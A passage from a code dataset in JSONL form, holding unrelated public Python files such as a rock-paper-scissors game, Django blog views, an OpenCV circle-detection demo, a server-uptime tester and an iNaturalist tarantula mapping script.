print(\"Rock...\")\n    print(\"Paper...\")\n    print(\"Scissors...\")\n    print(\"Enter your choice: \")\n\n    player = input(\"Player 1, make your move.\\nYou can also type 'quit' or 'q' to quit the game:\\n\").lower()\n\n    if player == \"quit\" or player == \"q\":\n        break\n\n    rand_num = randint(0, 2)\n    if rand_num == 0:\n        computer = \"rock\"\n    elif rand_num == 1:\n        computer = \"paper\"\n    else:\n        computer = \"scissors\"\n\n    print(f\"The computer plays: {computer}\")\n\n    if player == computer:\n        print(\"Tie game!!\")\n    elif player == \"rock\":\n        if computer == \"scissors\":\n            print(\"The player wins!!\")\n            player_wins += 1\n        else:\n            print(\"The computer wins!!\")\n            computer_wins += 1\n    elif player == \"paper\":\n        if computer == \"rock\":\n            print(\"The player wins!!\")\n            player_wins += 1\n        else:\n            print(\"The computer wins!!\")\n            computer_wins += 1\n    elif player == \"scissors\":\n        if computer == \"rock\":\n            print(\"The computer wins!!\")\n            computer_wins += 1\n        else:\n            print(\"The player wins!!\")\n            player_wins += 1\n    else:\n        print(\"Something went wrong, please enter a choice\")\n\nif player_wins > computer_wins:\n    print(\"YOU WIN!!\")\nelse:\n    print(\"OH NO!! THE COMPUTER WON :(\")\nprint(f\"Final Score... 
Player Score: {player_wins} Computer Score: {computer_wins}\")","repo_name":"patricklapgar/Rock_Paper_Scissors_Game","sub_path":"rps_version_4.py","file_name":"rps_version_4.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24613810665","text":"import os\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\n\n\ndef image_paths(scale, mode, path='./'):\n if scale == 'multiple':\n scale = [3, 4] if mode == 'train' else [4, 6]\n\n input = [os.path.join(path, f'blur_scale_{s}/X_{mode}.npy') for s in scale]\n label = os.path.join(path, f'blur_scale_1/X_{mode}.npy')\n return input, label\n\n\nclass TrainDataset(Dataset):\n def __init__(self, input_path, label_path, N=None):\n super(TrainDataset, self).__init__()\n k = len(input_path)\n\n # number of samples\n if N==None: N = np.load(input_path[0]).shape[0]\n\n # mixing samples of k blurring scales\n self.input = np.concatenate([np.load(_)[(i * (N // k)): ((i + 1) * (N // k))] for i, _ in enumerate(input_path)], axis=0)\n self.label = np.load(label_path)[:N]\n\n # to Torch tensor\n self.input = torch.from_numpy(self.input)\n self.label = torch.from_numpy(self.label)\n\n def __getitem__(self, idx):\n X = self.input[idx]\n y = self.label[idx]\n\n return X, y\n\n def __len__(self):\n return len(self.input)","repo_name":"HHTseng/Layer-Variational-Analysis","sub_path":"Exp3_SRCNN/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"16172792372","text":"from odoo import fields, models, api\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n pos_order_ids = fields.One2many('pos.order', 'account_move')\n\n def _stock_account_get_last_step_stock_moves(self):\n stock_moves = super(AccountMove, self)._stock_account_get_last_step_stock_moves()\n for invoice in self.filtered(lambda x: x.type == 'out_invoice'):\n stock_moves += invoice.sudo().mapped('pos_order_ids.picking_id.move_lines').filtered(lambda x: x.state == 'done' and x.location_dest_id.usage == 'customer')\n for invoice in self.filtered(lambda x: x.type == 'out_refund'):\n stock_moves += invoice.sudo().mapped('pos_order_ids.picking_id.move_lines').filtered(lambda x: x.state == 'done' and x.location_id.usage == 'customer')\n return stock_moves\n\n def _compute_amount(self):\n super(AccountMove, self)._compute_amount()\n pos_invoices = self.filtered(lambda i: i.type in ['out_invoice', 'out_refund'] and i.pos_order_ids)\n for invoice in pos_invoices:\n invoice.invoice_payment_state = 'paid'\n\nclass AccountMoveLine(models.Model):\n _inherit = 'account.move.line'\n\n def _stock_account_get_anglo_saxon_price_unit(self):\n self.ensure_one()\n if not self.product_id:\n return self.price_unit\n price_unit = super(AccountMoveLine, self)._stock_account_get_anglo_saxon_price_unit()\n order = self.move_id.pos_order_ids\n if order:\n price_unit = - order._get_pos_anglo_saxon_price_unit(self.product_id, self.move_id.partner_id.id, self.quantity)\n return price_unit\n\n def _get_refund_tax_audit_condition(self, aml):\n # Overridden so that the returns can be detected as credit notes by the tax audit computation\n rslt = super()._get_refund_tax_audit_condition(aml)\n\n if aml.move_id.is_invoice():\n # We don't need to check the pos orders for this move line if an invoice\n # is linked to it ; we know that the invoice type tells us whether 
it's a refund\n return rslt\n\n pos_orders_count = self.env['pos.order'].search_count([('account_move', '=', aml.move_id.id)])\n return rslt or (pos_orders_count and aml.debit > 0)\n","repo_name":"saifDiu/odoo_13_my_module","sub_path":"addons/point_of_sale/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"69932768480","text":"import torch\nfrom vietocr.model.backbone.cnn import CNN\nimport torch.nn as nn\nimport time\nimport torchvision\nfrom torchsummary import summary\n\n\ndef _cnn_backbone(img_channel, img_height, img_width, leaky_relu):\n assert img_height % 16 == 0\n assert img_width % 4 == 0\n\n channels = [img_channel, 64, 128, 256, 256, 512, 512, 512]\n kernel_sizes = [3, 3, 3, 3, 3, 3, 2]\n strides = [1, 1, 1, 1, 1, 1, 1]\n paddings = [1, 1, 1, 1, 1, 1, 0]\n\n cnn = nn.Sequential()\n\n def conv_relu(i, batch_norm=False):\n # shape of input: (batch, input_channel, height, width)\n input_channel = channels[i]\n output_channel = channels[i+1]\n\n cnn.add_module(\n f'conv{i}',\n nn.Conv2d(input_channel, output_channel, kernel_sizes[i], strides[i], paddings[i])\n )\n\n if batch_norm:\n cnn.add_module(f'batchnorm{i}', nn.BatchNorm2d(output_channel))\n\n relu = nn.LeakyReLU(0.2, inplace=True) if leaky_relu else nn.ReLU(inplace=True)\n cnn.add_module(f'relu{i}', relu)\n\n # size of image: (channel, height, width) = (img_channel, img_height, img_width)\n conv_relu(0)\n cnn.add_module('pooling0', nn.MaxPool2d(kernel_size=2, stride=2))\n # (64, img_height // 2, img_width // 2)\n\n conv_relu(1)\n cnn.add_module('pooling1', nn.MaxPool2d(kernel_size=2, stride=2))\n # (128, img_height // 4, img_width // 4)\n\n conv_relu(2)\n conv_relu(3)\n cnn.add_module(\n 'pooling2',\n nn.MaxPool2d(kernel_size=(2, 1))\n ) # (256, img_height // 8, img_width // 4)\n\n conv_relu(4, batch_norm=True)\n conv_relu(5, batch_norm=True)\n cnn.add_module(\n 'pooling3',\n nn.MaxPool2d(kernel_size=(2, 1))\n ) # (512, img_height // 16, img_width // 4)\n\n conv_relu(6) # (512, img_height // 16 - 1, img_width // 4 - 1)\n\n output_channel, output_height, output_width = \\\n channels[-1], img_height // 16 - 1, img_width // 4 - 1\n return cnn, (output_channel, output_height, output_width)\n\ndevice= 'cuda'\n#cnn_config_vgg19 = {'ss': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'ks': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'hidden': 256}\n#cnn = CNN('vgg19_bn', **cnn_config_vgg19)\n#cnn_config_vgg11 = {'ss': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'ks': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'hidden': 256}\n#cnn = CNN('vgg11_bn', **cnn_config_vgg11)\n#cnn_config_resnet50 = {'ss': [[2, 2], [2, 1], [2, 1], [2, 1], [1, 1]], 'hidden': 256} \n#cnn = CNN('resnet50', **cnn_config_resnet50)\n#cnn_config_resnet18 = {'ss': [[2, 2], [2, 1], [2, 1], [2, 1], [1, 1]], 'hidden': 256} \n#cnn = CNN('resnet18', **cnn_config_resnet18)\n#cnn,_ = _cnn_backbone(img_channel=3, img_height=32, img_width=220, leaky_relu=True)\n#cnn = CNN('mobilenetv1_0.25')\ncnn_config_mobilenetv2 = {'ss': [[2, 2], [2, 1], [2, 1], [2, 1], [1, 1]], 'hidden': 256} \ncnn = CNN('mobilenetv2', **cnn_config_mobilenetv2)\n#cnn = torchvision.models.mobilenet_v2()\n#cnn = torch.nn.Sequential(*(list(cnn.children())[0][:7]))\n#cnn = torchvision.models.shufflenet_v2_x1_5()\n#cnn = torch.nn.Sequential(*(list(cnn.children())[0][:7]))\n#cnn = torchvision.models.mnasnet1_0()\n#cnn = 
torch.nn.Sequential(*(list(cnn.children())[0][:9]))\n#print(cnn)\ncnn = cnn.to(device)\nif device == \"cuda\":\n    summary(cnn, (3, 32, 1024))\ntorch.cuda.synchronize()\nt1 = time.time()\nx = torch.zeros(1, 3, 32, 1024).to(device)\ny = cnn(x)\nprint(y.shape)\ntorch.cuda.synchronize()\nprint(time.time()-t1)\n\n","repo_name":"TrangLeQuynh/vietocr","sub_path":"test_backbone.py","file_name":"test_backbone.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17657790651","text":"class Student:\r\n    ID=\"\"\r\n    CGPA=\"\"\r\n\r\n\r\n    def __init__(self,roll,cgpa):\r\n        self.ID=roll\r\n        self.CGPA=cgpa\r\n\r\n    def display(self):\r\n        print(f\"ID:{self.ID},cgpa:{self.CGPA}\")\r\n\r\nMomin= Student(123,3.54)\r\nMomin.display()\r\nAminul=Student(213112,3.45)\r\nAminul.display()","repo_name":"Mominul-Islam-cmd/python_practice","sub_path":"Opp/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18515865680","text":"from kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.image import Image\nfrom servermacc import TestServerAdd\nfrom callservertest import *\nimport threading\nimport requests\nimport time\nfrom emailconf import send_email\n\n\nclass FunServer(Screen):\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n\n        # Create the screen's widgets\n        self.label = Label(text=\"¡Esta es la pantalla de Test Server!\", font_size=24, halign=\"center\")\n        self.status_button = Button(text=\"Inactivo\", font_size=20, size_hint_y=None, height=50)\n        self.status_button.bind(on_press=self.change_status)\n        self.status = \"inactivo\"\n\n\n        self.button_atras = Button(text=\"Volver\", font_size=20, size_hint_y=None, height=50)\n        self.button_atras.bind(on_press=self.switch_to_funserver)\n\n        # Create an Image instance with the server icon\n        self.spiral = Image(source=\"server_icon_197663.png\")\n\n        # Create a vertical layout for the widgets\n        layout = BoxLayout(orientation=\"vertical\", padding=50, spacing=20)\n        layout.add_widget(self.label)\n\n        layout.add_widget(self.status_button)\n        layout.add_widget(self.button_atras)\n\n        layout.add_widget(self.spiral)\n\n        # Add the layout to the screen\n        self.add_widget(layout)\n\n\n    def switch_to_funserver(self, instance):\n        screen_manager = self.manager\n        self.status_button.text = \"Inactivo\"\n        screen_manager.current = \"next_screen\"\n        stop_thread_execution()\n\n\n\n    def on_enter(self):\n        # Look for the TestServerAdd object in the application's list of screens\n        for screen in self.manager.screens:\n            if isinstance(screen, TestServerAdd):\n                self.test_server_add = screen\n                break\n\n    def change_status(self, instance):\n\n        stop_event.clear()\n\n        # Toggle the status and update the button text\n        if self.status == \"inactivo\":\n            self.status = \"activo\"\n            self.status_button.text = \"Activo\"\n            self.label.text = \"Probando Conexion con los Servidores\"\n            self.spiral.opacity = 1 # show the icon while the test loop is running\n            if self.test_server_add:\n                if self.status_button.text == \"Activo\":\n                    t = threading.Thread(target=testServerCAll, args=(self.test_server_add.servers,))\n                    t.start()\n\n\n        else:\n            self.status = \"inactivo\"\n            self.status_button.text = \"Inactivo\"\n            self.label.text = \"Se ha detenido Conexion con los Servidores\"\n            self.spiral.opacity = 0 # hide the icon once testing stops\n            stop_thread_execution()\n\n#####################################################################################\n\n\n\nstop_event = threading.Event()\n\ndef testServerCAll(getlist):\n    while True:\n        for url in getlist:\n            start_time = time.time()\n\n            try:\n                response = requests.head(url, verify=False, timeout=10)\n                if response.status_code == 200:\n                    pass\n                else:\n                    end_time = time.time()\n                    result = f\"Fallo de solicitud a {url}. Código de estado: {response.status_code}\\nLa solicitud tardó: {end_time - start_time} segundos en completarse\\n\\n\"\n                    send_email(result)\n            except requests.exceptions.Timeout:\n                result = f\"Timeout de conexión con {url}\\n\\n\"\n                send_email(result)\n            except requests.exceptions.RequestException as e:\n                result = f\"Error de conexión con {url}: {e}\\n\\n\"\n\n                send_email(result)\n\n        if stop_event.is_set():\n            break\n\ndef stop_thread_execution():\n    stop_event.set()\n\n","repo_name":"MikeCardona076/Tester-MACC-SERVER","sub_path":"testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"7704971002","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path(\"\", views.index, name='index'),\n    path(\"home\", views.home, name='home'),\n    path(\"register\", views.register, name='register'),\n    path(\"setup\", views.setup, name='setup'),\n    path(\"createSlot\", views.create_slot, name='create_slot'),\n    path(\"login\", views.login_view, name=\"login_view\"),\n    path(\"logout\", views.logout_view, name=\"logout_view\"),\n]","repo_name":"anusha421/MeetUp","sub_path":"meetup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20886070410","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\n# read\nimg = cv.imread('logo.jpg', cv.IMREAD_COLOR)\n\n# convert to gray\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n# blur\nblur = cv.medianBlur(gray, 5)\n\n# get circles\ncircles = cv.HoughCircles(blur, cv.HOUGH_GRADIENT, 1, 20, param1=150, param2=30, minRadius=0, maxRadius=0)\n\n# around to make it integer\ncircles_around = np.around(circles)\n\n# convert float32 to uint16\ncircles_uint16 = np.uint16(circles_around)\n\n# make result\nresult = img.copy()\n\n# loop\nfor circle in circles_uint16[0, :]:\n    # get center\n    center = tuple(circle[0:2])\n    # get radius\n    radius = int(circle[2])\n    # draw the outer circle\n    cv.circle(result, center, radius, (0, 255, 0), 2)\n    # draw the center of the circle\n    cv.circle(result, center, 2, (0, 0, 255), 3)\n\n# show\nplt.subplot(2, 2, 1), plt.imshow(img), plt.title(\"original\")\nplt.subplot(2, 2, 2), plt.imshow(blur, \"gray\"), plt.title(\"blur\")\nplt.subplot(2, 2, 3), plt.imshow(gray, \"gray\"), plt.title(\"gray\")\nplt.subplot(2, 2, 4), plt.imshow(result), plt.title(\"result\")\nplt.show()\n","repo_name":"AlanLi7991/opencv-turtorial-notes","sub_path":"04-image/27-hough-circle.py","file_name":"27-hough-circle.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"15033257301","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404, HttpResponse\nfrom django.core.mail import 
send_mail\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import (\n    login_required,\n    user_passes_test,\n)\nfrom django.contrib.auth import authenticate, login as auth_login, logout as auth_logout\nimport datetime as dt\nfrom datetime import datetime, timedelta, date\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom home.views import give_doctors_of_this_department\nfrom home.models import Departments\nfrom doctor.models import Doctor, BookAppointment\nfrom patient.models import Patient\nfrom blogs.models import *\nfrom blogs.forms import *\nfrom django.contrib.auth.models import User\n\n\ndef bhome(request):\n    user = request.user\n    usertype = {\"doc\": 0, \"pat\": 0}\n    if request.user.is_authenticated:\n        try:\n            if user.doctor:\n                usertype[\"doc\"] = 1\n                doctor = user.doctor\n                records = BookAppointment.objects.filter(doctor_id=user.doctor.id)[::-1]\n                #########\n                try:\n                    status = request.GET[\"aor\"]\n                    record_id = int(status[:-1])\n                    record = BookAppointment.objects.get(id=record_id)\n                    if status[-1] == \"a\":\n                        record.status = 1\n                        record.save()\n                    else:\n                        record.delete()\n                except:\n                    status = None\n                d = {\"doctor\": doctor, \"records\": records}\n        except:\n            usertype[\"pat\"] = 1\n            patient = user.patient\n            records = BookAppointment.objects.filter(patient_id=user.patient.id)\n    else:\n        records = []\n    # accepting or rejecting appointments\n    bdone = 1\n    data = {}\n    all_blogs = Blogs.objects.all()[::-1]\n    departments = Departments.objects.all()\n    b = Blogs()\n    try:\n        print(\"try chala of loadmore\")\n        loadmore = request.GET[\"loadmore\"]\n        b.load += 1\n        if b.load * 5 >= len(all_blogs):\n            b.load = 1\n            blogs = all_blogs\n        else:\n            value = b.load * 5\n            blogs = all_blogs[:value]\n    except:\n        print(\"except of loadmore\")\n        if len(all_blogs) <= 5:\n            blogs = all_blogs\n            bdone = 0\n        else:\n            blogs = all_blogs[:5]\n    for department in departments:\n        data[department] = give_doctors_of_this_department(department)\n    d = {\n        \"departments\": departments,\n        \"data\": data,\n        \"user\": user,\n        \"usertype\": usertype,\n        \"records\": records,\n        \"ln\": len(blogs),\n        \"blogs\": blogs,\n        \"bdone\": bdone,\n    }\n    return render(request, \"blogs/index.html\", d)\n\n\ndef createblog(request):\n    try:\n        print(\"try chala\")\n        title = request.GET[\"title\"]\n        description = request.GET[\"desc\"]\n    except:\n        title = description = None\n        print(\"Except chala\")\n    if title and description:\n        print(\"TITLE_AND_DESCRIPTION\")\n        obj = Blogs.objects.create(user=request.user)\n        obj.user = request.user\n        obj.title = title\n        obj.description = description\n        obj.save()\n        return redirect(\"blogs\")\n    d = {}\n    return render(request, \"blogs/createblog.html\", d)\n\n\ndef particular_blog(request, pk):\n    user = request.user\n    usertype = {\"doc\": 0, \"pat\": 0}\n    blog = Blogs.objects.get(id=pk)\n    departments = Departments.objects.all()\n    if request.user.is_authenticated:\n        try:\n            if user.doctor:\n                usertype[\"doc\"] = 1\n                doctor = user.doctor\n                print(\"DDDDDD\", doctor, type(doctor), doctor.user.username)\n                records = BookAppointment.objects.filter(doctor_id=user.doctor.id)[::-1]\n                #########\n                try:\n                    print(\"HOMEEE\")\n                    status = request.GET[\"aor\"]\n                    record_id = int(status[:-1])\n                    print(\"STATUS\", status)\n                    record = BookAppointment.objects.get(id=record_id)\n                    if status[-1] == \"a\":\n                        print(\"BEFORE\", record.status)\n                        record.status = 1\n                        record.save()\n                        print(\"AFTER\", record.status)\n                    else:\n                        record.delete()\n
                except:\n                    status = None\n                d = {\n                    \"doctor\": doctor,\n                    \"records\": records,\n                    \"blog\": blog,\n                    \"user\": user,\n                    \"departments\": departments,\n                }\n        except:\n            print(\"PATIENTTTTTT\")\n            usertype[\"pat\"] = 1\n            patient = user.patient\n            records = BookAppointment.objects.filter(patient_id=user.patient.id)\n            d = {\n                \"patient\": patient,\n                \"records\": records,\n                \"blog\": blog,\n                \"user\": user,\n                \"departments\": departments,\n            }\n    else:\n        records = []\n        # build the template context for anonymous visitors too; without this, the render() call below raises a NameError because d is never bound\n        d = {\n            \"records\": records,\n            \"blog\": blog,\n            \"user\": user,\n            \"departments\": departments,\n        }\n    return render(request, \"blogs/particular_blog.html\", d)\n","repo_name":"sagar-panditji/WARDAAN","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32848118512","text":"import itertools\nfrom PIL import (\n    Image, ImageDraw,\n)\nfrom IPython.display import display\n\nfrom container.base import (\n    OpenBase, ClosedBase,\n)\n\nfrom graph.node import Node\nfrom graph.grid import GridMap\n\n\ndef drawResult(\n    grid: GridMap,\n    start: Node = None,\n    goal: Node = None,\n    path: list = None,\n    closed_list: ClosedBase = None,\n    open_list: OpenBase = None,\n    draw_cost: bool = False,\n    save: bool = False,\n    plot: bool = True,\n) -> None:\n    \n    def getRectangle(\n        i: int,\n        j: int,\n        k: int,\n    ) -> list:\n        \n        return [j * k, i * k, (j + 1) * k - 1, (i + 1) * k - 1]\n    \n    k = 20\n    hIm = grid.height * k\n    wIm = grid.width * k\n    im = Image.new('RGB', (wIm, hIm), color = 'white')\n    draw = ImageDraw.Draw(im)\n    \n    for i, j in itertools.product(range(grid.height), range(grid.width)):\n        if grid.isObstacle(i, j):\n            draw.rectangle(\n                xy = getRectangle(i, j, k),\n                fill = (70, 80, 80),\n            )\n    \n    for nodes, color in zip((open_list, closed_list),\n                            ((213, 219, 219), (131, 145, 146))):\n        if nodes is not None:\n            for node in nodes:\n                draw.rectangle(\n                    xy = getRectangle(node.i, node.j, k),\n                    fill = color,\n                    width = 0,\n                )\n    \n    if draw_cost and closed_list is not None:\n        # draw the accumulated g-cost of each expanded (closed) node; the original looped over an undefined name\n        for node in closed_list:\n            coord = getRectangle(node.i, node.j, k)\n            draw.text(\n                xy = ((coord[0] + coord[2]) // 2, (coord[1] + coord[3]) // 2),\n                text = '%.1f' % (node.g),\n                fill = (231, 76, 60),\n            )\n\n    if path is not None:\n        for node in path:\n            draw.rectangle(\n                xy = getRectangle(node.i, node.j, k),\n                fill = (52, 152, 219) if not grid.isObstacle(node.i, node.j) else (230, 126, 34),\n                width = 0,\n            )\n    \n    for keypoint, color in zip((start, goal),\n                               ((40, 180, 99), (231, 76, 60))):\n\n        if keypoint is not None:\n            draw.rectangle(\n                xy = getRectangle(keypoint.i, keypoint.j, k),\n                fill = color, \n                width = 0,\n            )\n    if plot:\n        display(im)\n    \n    if save:\n        im.save(f'images/{start.i}_{start.j}|{goal.i}_{goal.j}.png')","repo_name":"Ilyabasharov/path_planning","sub_path":"utils/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"15314787275","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#map geo data source\n#https://www.census.gov/geographies/mapping-files/time-series/geo/carto-boundary-file.html\n#https://www.parks.ca.gov/?page_id=29682\n#iNaturalist sources\n#https://pyinaturalist.readthedocs.io/en/stable/modules/pyinaturalist.v1.observations.html#pyinaturalist.v1.observations.get_observations\n#https://www.inaturalist.org/pages/api+reference\n\n#########################################\n\n#You will need three shape files to create the map.\n#Download California_shape_Archive.zip from 
https://github.com/Floydworks/Tarantulas_Map_iNat/tree/main/shape_files\n#Or use websites in source information (this may require changing the map projections)\n\n#######################################\n\n\n\n# In[2]:\n\n\nfrom pyinaturalist.node_api import get_all_observations\nimport pandas as pd\nimport numpy as np\nfrom datetime import date, datetime\nimport time\n\nimport geopandas as gpd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\n\nprint(\"Libraries imported!\")\n\n\n# In[3]:\n\n\n#define start time for entire process\nstart_time = time.time()\n\n\n# In[4]:\n\n\n#define function, simplify_observation, to extract the desired data from the query return list object, Observations,\n#returning a newly created dictionary of extracted values, simplified_obs.\n\ndef simplify_observation(obs):\n\n    simplified_obs = {}\n\n    # Top level values\n    simplified_obs['Date'] = obs['observed_on']\n    simplified_obs['Created_Date'] = obs['created_at']\n    simplified_obs['Updated_Date'] = obs['updated_at']\n    simplified_obs['Location_Name'] = obs['place_guess']\n    simplified_obs['Place_ids'] = obs['place_ids']\n    simplified_obs['URL'] = obs['uri']\n    simplified_obs['quality'] = obs['quality_grade']\n\n    # Nested values\n    simplified_obs['species_name'] = obs['taxon']['name']\n    simplified_obs['coordinates'] = obs['geojson']['coordinates']\n    simplified_obs['endemic'] = obs['taxon']['endemic']\n    simplified_obs['native'] = obs['taxon']['native']\n    simplified_obs['threatened'] = obs['taxon']['threatened']\n    simplified_obs['observations_count'] = obs['taxon']['observations_count']\n\n#Name new columns and fill with values extracted from dataset\n\n    #split lat, long into separate columns\n    for i in range(len(obs['geojson']['coordinates'])):\n        #create columns for lat and long separately\n        simplified_obs['lat'] =obs['geojson']['coordinates'][0]\n        simplified_obs['long'] =obs['geojson']['coordinates'][1]\n\n    #split species name into separate columns, 'genus', 'species', and 'variety'\n    for i in range(len(obs['taxon']['name'])):\n        tn = obs['taxon']['name'] + ' ' + 'none' + ' ' + 'none' #add a space to alleviate name anatomy issues\n        #create columns for genus and species separately\n        simplified_obs['genus'] =tn.split(' ')[0]\n        simplified_obs['species'] =tn.split(' ')[1]\n        simplified_obs['variety'] =tn.split(' ')[2]\n\n    #Media/photo path columns\n    for i in range(len(obs['photos'])): \n        # Change value here if you want more or less than 3 photos\n        if(i<1):\n            simplified_obs['photo '+str(i)] = obs['photos'][i]['url'].replace('square', 'original')\n\n    return simplified_obs\n\n\n# In[5]:\n\n\n#Call query through pyinaturalist.node_api, no authentication required\nprint(\"This may take a few minutes... For larger exports you may need to get a key from iNaturalist\")\n\nstart_time_query = time.time()\n#use today's date as the maximum date for data retrieval\ntoday = date.today()\n\n#assign iNaturalist place IDs (see iNaturalist.org)\nPLACES = [14] #14= California\n#initialize empty list for storing data\nObservations = []\n\nfor p in PLACES:\n\n    observations_research = get_all_observations( \n        taxon_id=47423,        # Taxon ID for Aphonopelma spp. 
Tarantulas\n place_id=[p], # Location ID from PLACES list\n d1='2018-01-01', # Get observations from October 1st 2017...\n d2= today, # ...through today\n #created_d1= '2023-01-01',\n #created_d2= today,\n #updated_since ='2023-01-01', #Must be updated since this time\n #radius = #Must be within a {radius} kilometer circle around this lat/lng (lat, lng, radius)\n geo=True, # Only get observations with geospatial coordinates\n geoprivacy='open', # Only get observations with public coordinates (not obscured/private)\n #quality_grade = 'research' #Only get research grade observations\n \n )\n print(\"Observations\", str(p), \"ready!\", \"This place_id has:\", len(observations_research), \"observations\")\n \n #add queried data, observations_research, to storage list, Observations\n Observations = Observations+observations_research\n \nprint(\"Observations concatenated!\",\"There are:\", len(Observations), \"observations, prior to cleaning your dataset\")\n\nquery_time = (time.time() - start_time_query)\nprint(\"Run time for your api request: %s seconds\" % (query_time))\n\n\n# In[6]:\n\n\n#apply function (simplify_observation() to each observation in Observations and store in list object\nsimpleObs = [simplify_observation(obs) for obs in Observations] #returns nested dictionary\nprint(\"Observations simplified!\")\n\n#convert list object simpleObs to pandas dataframe df_obs\ndf_obs = pd.DataFrame.from_records(simpleObs)\n\n#export the complete dataset\ndate_string = str(today.month)+\"_\"+str(today.day)+\"_\"+str(today.year)\ndf_obs.to_csv(f'YOUR FILE PATH{date_string}.csv')\n\n\n# In[7]:\n\n\n#clean data and drop certain data\n\n# replace 'none' with NaN\nprior_len = len(df_obs)\ndf_obs = df_obs.replace('none', np.nan)\nprint(prior_len - len(df_obs), \"'none' species names converted to NaN values\")\n\n#drop observations with no species name\n#prior_len = len(df_obs)\n#df_obs = df_obs.dropna(subset=['species'])\n#print(prior_len-len(df_obs), \"observations had no species name\")\n\n#drop observations with no genus name\nprior_len = len(df_obs)\ndf_obs = df_obs.dropna(subset=['genus'])\nprint(prior_len-len(df_obs), \"observations had no genus name\")\n\n#drop observations with no date\nprior_len = len(df_obs)\ndf_obs = df_obs.dropna(subset=['Date'])\nprint(prior_len - len(df_obs), \"observations had no date\")\n\n#drop observations below research grade\n#prior_len = len(df_obs)\n#df_obs = df_obs[df_obs[\"quality\"].str.contains(\"needs_id|casual\") == False]\n#print(prior_len-len(df_obs), \"oservations were below research grade\")\n\n\n# In[8]:\n\n\ndf_obs.reset_index(inplace = True)\nprint('There are:', len(df_obs), 'observations in the dataset.')\ndisplay(df_obs.head(3))\n\n\n# In[ ]:\n\n\n# Make a map of California with county borders, tarantula observations, state parks, and wilderness areas.\n\n\n# In[12]:\n\n\n#city DICTIONARY \ncity_info_dict = {\n \"San Jose\": {\"place_id\":\"\",\"region\": \"south bay\", 'lat_long':(37.2959622,-121.8160962)},\n \"Los Angeles\": {\"place_id\":\"\",\"region\": \"southern\", 'lat_long':(34.020479,-118.4117325)},\n \"Sacramento\": {\"place_id\":\"\",\"region\": \"northern\", 'lat_long':(38.6594734, -121.21373)},\n }\n\n#create dataframe of city information\ncity_info_df = pd.DataFrame.from_dict(city_info_dict, orient='index').reset_index()\ncity_info_df = city_info_df.rename(columns={'index':'city'})\n\ndisplay(city_info_df)\n\n\n# In[10]:\n\n\n#define shape file paths\n\nCA_counties_shp = 'YOUR FILE 
PATH/CA_Counties_TIGER2016_4269.shp'\nCA_wilderness_areas = 'YOUR FILE PATH/Wilderness_Areas_122721_EPSG4269_CALIFORNIA.shp'\nCA_state_parks = 'YOUR FILE PATH/ParkBoundaries_EPSG4269_CALIFORNIA.shp'\n\n# initialize an axis\nfig, ax = plt.subplots(figsize=(15,12))\n\n# plot map on axis\n#California Counties outline\nshape = gpd.read_file(CA_counties_shp)\n#shape = shape[shape['COUNTYFP'].isin(['019','027','107'])]\n\n#Wilderness areas outlines\nwilderness = gpd.read_file(CA_wilderness_areas)\n# find specific park(s)\n#wilderness = wilderness[wilderness['NAME_ABBRE'].str.contains(\"Kings_Canyon\")] \n\n#State parks areas outlines\nstate_parks = gpd.read_file(CA_state_parks)\n\nshape.plot(color=\"lightgrey\", edgecolor='darkgrey',ax=ax)\nwilderness.plot(color=\"lightgreen\", alpha=.6, ax=ax) #edgecolor='darkgreen',\nstate_parks.plot(color=\"yellow\", alpha=1, ax=ax) #edgecolor='gold',\n\n#define observation x and y using lat and long from the iNat observations\nx = df_obs['lat']\ny = df_obs['long']\n#plot the tarantula observations\nplt.scatter(x, y, c= \"blue\", alpha=1, s=2.5)\n\n#add major cities to the map\n#manually place each city and adjust text position to avoid observation points\nplt.text((city_info_df.loc[city_info_df['city'] == 'San Jose', 